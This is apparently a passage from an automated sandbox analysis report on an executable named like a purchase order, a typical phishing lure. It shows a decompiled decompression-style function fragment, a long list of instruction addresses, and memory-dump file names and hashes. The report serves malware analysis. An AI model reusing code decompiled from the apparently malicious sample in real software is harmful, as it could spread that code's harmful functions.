												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                          0x00000000
                                                                                                                          0x0040663c
                                                                                                                          0x0040663c
                                                                                                                          0x00406640
                                                                                                                          0x00406669
                                                                                                                          0x00406673
                                                                                                                          0x00406642
                                                                                                                          0x0040664b
                                                                                                                          0x00406658
                                                                                                                          0x0040665b
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069f0
                                                                                                                          0x004069f4
                                                                                                                          0x00406ba3
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bc1
                                                                                                                          0x00406bc8
                                                                                                                          0x00406bca
                                                                                                                          0x00406bd1
                                                                                                                          0x00406bd5
                                                                                                                          0x00406bd5
                                                                                                                          0x00406a00
                                                                                                                          0x00406a07
                                                                                                                          0x00406a0f
                                                                                                                          0x00406a12
                                                                                                                          0x00406a15
                                                                                                                          0x00406a15
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00000000
                                                                                                                          0x004061d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061da
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ea
                                                                                                                          0x004061ed
                                                                                                                          0x004061ef
                                                                                                                          0x004061f0
                                                                                                                          0x004061f3
                                                                                                                          0x004061f5
                                                                                                                          0x004061f6
                                                                                                                          0x004061f8
                                                                                                                          0x004061fb
                                                                                                                          0x00406200
                                                                                                                          0x00406205
                                                                                                                          0x0040620e
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406230
                                                                                                                          0x00406258
                                                                                                                          0x0040625a
                                                                                                                          0x00406268
                                                                                                                          0x00406268
                                                                                                                          0x0040626c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x0040625c
                                                                                                                          0x0040625f
                                                                                                                          0x00406260
                                                                                                                          0x00406260
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x00406236
                                                                                                                          0x0040623b
                                                                                                                          0x0040623b
                                                                                                                          0x00406244
                                                                                                                          0x0040624c
                                                                                                                          0x0040624f
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406272
                                                                                                                          0x00406272
                                                                                                                          0x00406276
                                                                                                                          0x00406b22
                                                                                                                          0x00000000
                                                                                                                          0x00406b22
                                                                                                                          0x0040627f
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x004062ce
                                                                                                                          0x004062d4
                                                                                                                          0x004062db
                                                                                                                          0x00000000
                                                                                                                          0x004062db
                                                                                                                          0x004062aa
                                                                                                                          0x004062ad
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062bd
                                                                                                                          0x004062c5
                                                                                                                          0x004062c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040630d
                                                                                                                          0x00406313
                                                                                                                          0x00406316
                                                                                                                          0x00406323
                                                                                                                          0x0040632b
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062e2
                                                                                                                          0x004062e2
                                                                                                                          0x004062e6
                                                                                                                          0x00406b31
                                                                                                                          0x00000000
                                                                                                                          0x00406b31
                                                                                                                          0x004062f2
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x00406300
                                                                                                                          0x00406303
                                                                                                                          0x00406306
                                                                                                                          0x0040630b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406333
                                                                                                                          0x00406335
                                                                                                                          0x00406338
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063b6
                                                                                                                          0x004063c0
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040633a
                                                                                                                          0x0040633e
                                                                                                                          0x00406341
                                                                                                                          0x00406343
                                                                                                                          0x00406346
                                                                                                                          0x00406349
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x00406350
                                                                                                                          0x00406355
                                                                                                                          0x00406358
                                                                                                                          0x0040635b
                                                                                                                          0x0040635f
                                                                                                                          0x00406366
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406374
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x00406380
                                                                                                                          0x00406383
                                                                                                                          0x004063a1
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00406385
                                                                                                                          0x00406385
                                                                                                                          0x00406388
                                                                                                                          0x0040638b
                                                                                                                          0x0040638e
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406393
                                                                                                                          0x00406396
                                                                                                                          0x00406398
                                                                                                                          0x00406399
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x004065d2
                                                                                                                          0x004065d6
                                                                                                                          0x004065f4
                                                                                                                          0x004065f7
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x0040660a
                                                                                                                          0x0040660d
                                                                                                                          0x0040660f
                                                                                                                          0x00406616
                                                                                                                          0x00406617
                                                                                                                          0x00406619
                                                                                                                          0x0040661c
                                                                                                                          0x0040661f
                                                                                                                          0x00406622
                                                                                                                          0x00406622
                                                                                                                          0x00406627
                                                                                                                          0x00000000
                                                                                                                          0x00406627
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e8
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040667f
                                                                                                                          0x00406683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406689
                                                                                                                          0x0040668d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406693
                                                                                                                          0x00406695
                                                                                                                          0x00406699
                                                                                                                          0x00406699
                                                                                                                          0x0040669c
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066f0
                                                                                                                          0x004066f4
                                                                                                                          0x004066fb
                                                                                                                          0x004066fe
                                                                                                                          0x00406701
                                                                                                                          0x0040670b
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x004066f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406717
                                                                                                                          0x0040671b
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406744
                                                                                                                          0x00406749
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067d7
                                                                                                                          0x004067d7
                                                                                                                          0x004067db
                                                                                                                          0x00406b79
                                                                                                                          0x00000000
                                                                                                                          0x00406b79
                                                                                                                          0x004067e1
                                                                                                                          0x004067e4
                                                                                                                          0x004067e7
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f4
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f9
                                                                                                                          0x004067fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063cc
                                                                                                                          0x004063cc
                                                                                                                          0x004063d0
                                                                                                                          0x00406b3d
                                                                                                                          0x00000000
                                                                                                                          0x00406b3d
                                                                                                                          0x004063d6
                                                                                                                          0x004063d9
                                                                                                                          0x004063dc
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e9
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063ee
                                                                                                                          0x004063f1
                                                                                                                          0x004063f1
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063fd
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640d
                                                                                                                          0x00406410
                                                                                                                          0x00406413
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x0040641f
                                                                                                                          0x00406425
                                                                                                                          0x00406428
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00406431
                                                                                                                          0x00406434
                                                                                                                          0x00406437
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406463
                                                                                                                          0x00406467
                                                                                                                          0x00406469
                                                                                                                          0x0040646d
                                                                                                                          0x00406439
                                                                                                                          0x00406439
                                                                                                                          0x0040643d
                                                                                                                          0x00406445
                                                                                                                          0x0040644a
                                                                                                                          0x0040644c
                                                                                                                          0x0040644e
                                                                                                                          0x0040644e
                                                                                                                          0x00406470
                                                                                                                          0x00406477
                                                                                                                          0x0040647a
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406485
                                                                                                                          0x00406485
                                                                                                                          0x00406489
                                                                                                                          0x00406b49
                                                                                                                          0x00000000
                                                                                                                          0x00406b49
                                                                                                                          0x0040648f
                                                                                                                          0x00406492
                                                                                                                          0x00406495
                                                                                                                          0x00406499
                                                                                                                          0x0040649c
                                                                                                                          0x004064a2
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064b2
                                                                                                                          0x004064b5
                                                                                                                          0x004064b8
                                                                                                                          0x004064bb
                                                                                                                          0x004064be
                                                                                                                          0x004064c1
                                                                                                                          0x004064c4
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064cd
                                                                                                                          0x004064d0
                                                                                                                          0x004064e8
                                                                                                                          0x004064eb
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x004064f1
                                                                                                                          0x004064f4
                                                                                                                          0x004064f8
                                                                                                                          0x004064fa
                                                                                                                          0x004064d2
                                                                                                                          0x004064d2
                                                                                                                          0x004064da
                                                                                                                          0x004064df
                                                                                                                          0x004064e1
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064fd
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406507
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406549
                                                                                                                          0x00406549
                                                                                                                          0x0040654d
                                                                                                                          0x00406b55
                                                                                                                          0x00000000
                                                                                                                          0x00406b55
                                                                                                                          0x00406553
                                                                                                                          0x00406556
                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00000000
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00406a21
                                                                                                                          0x00406a1b
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406abf
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af1
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x00000000
                                                                                                                          0x004066e1
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00000000
                                                                                                                          0x00406bce
                                                                                                                          0x00406a1b
                                                                                                                          0x004069a2
                                                                                                                          0x0040699f

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                                                                                          • Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
                                                                                                                          • Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
